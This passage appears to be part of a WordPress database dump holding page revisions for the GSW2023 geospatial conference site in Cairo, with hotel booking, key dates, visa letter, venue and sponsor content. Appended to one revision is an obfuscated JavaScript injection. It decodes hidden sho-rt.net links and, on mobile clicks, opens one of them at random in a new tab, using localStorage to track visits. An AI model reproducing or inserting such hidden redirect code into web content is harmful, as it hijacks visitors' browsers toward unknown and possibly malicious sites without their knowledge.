#ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570733026{margin-top: 10px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:40:04','2023-06-24 01:40:04','',3066,'https://gsw2023.com/?p=4802',0,'revision','',0),
(4803,1,'2023-06-24 01:40:22','2023-06-24 01:40:22','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text 